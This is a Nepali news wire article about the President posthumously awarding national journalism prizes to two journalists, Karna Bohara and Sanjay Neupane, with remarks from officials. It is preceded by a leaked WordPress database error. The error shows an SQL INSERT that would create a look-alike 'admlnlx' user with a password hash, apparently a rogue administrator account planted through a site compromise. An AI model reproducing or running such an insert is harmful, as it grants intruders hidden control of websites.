WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B0102jVNZQyQ.vMkrP3P8HasjxpuGU0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 10:04:16', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस ५ –
राष्ट्रपति विद्यादेवी भण्डारीले ‘प्रेस काउन्सिल–सानिमा बैंक राष्ट्रिय पत्रकारिता पुरस्कार’ बाट आज दुई पत्रकारलाई मरणोपरान्त पुरस्कृत गर्नुभएको छ ।
राष्ट्रपति भवन शीतल निवासमा आयोजित समारोहमा दिवङ्गत पत्रकार कर्ण बोहरा र सञ्जय न्यौपानेका धर्मपत्नी क्रमशः ममता र राधिकालाई जनही रु दुई लाख ५० हजार राशिको सो पुरस्कार प्रदान गरिएको हो ।
कञ्चनपुरका पत्रकार बोहराको गत मङ्सिर ८ र ललितपुरका पत्रकार न्यौपानेको गत कात्तिक २० गते अल्पायुमा निधन भएको थियो । मिर्गाैलापीडित धर्मपत्नी ममताको उपचारको रेखदेखका क्रममा कर्णको तथा न्यौपानेको मस्तिष्काघातको उपचारका क्रममा निधन भएको थियो ।
समारोहमा राष्ट्रपति भण्डारीले प्रेस स्वतन्त्रताको उपयोग गर्दा नागरिक स्वतन्त्रता र व्यक्तिको गोपनीयतालाई समेत ख्याल गर्न आग्रह गर्दै पेसागत मर्यादा उच्च बनाउन र पत्रकार प्रोत्साहन गराउन काउन्सिलको भूमिका महत्वपूर्ण भएको बताउनुभयो ।
सूचना तथा सञ्चारमन्त्री सुरेन्द्रकुमार कार्कीले पत्रकारितालाई सम्मान गर्नु लोकतन्त्रको सम्मान हो भन्दै पत्रकारिताले लोकतन्त्रलाई परिष्कृत तुल्याउन भूमिका निर्वाह गर्ने जनाउनुभयो ।
काउन्सिलका अध्यक्ष बोर्णबहादुर कार्कीले असल काम गर्दा जीवनकालमा मात्र होइन मरणपछि पनि राष्ट्र र समाजले सम्मान गर्छ भन्ने सन्देश दिन सो पुरस्कार सफल भएको जनाउनुभयो । नेपाल पत्रकार महासङ्घका अध्यक्ष डा महेन्द्र विष्टले दिवङ्गत पत्रकारद्वयको निधनबाट पत्रकारिता क्षेत्रमा अपूरणीय क्षति पुगेको बताउनुभयो । रासस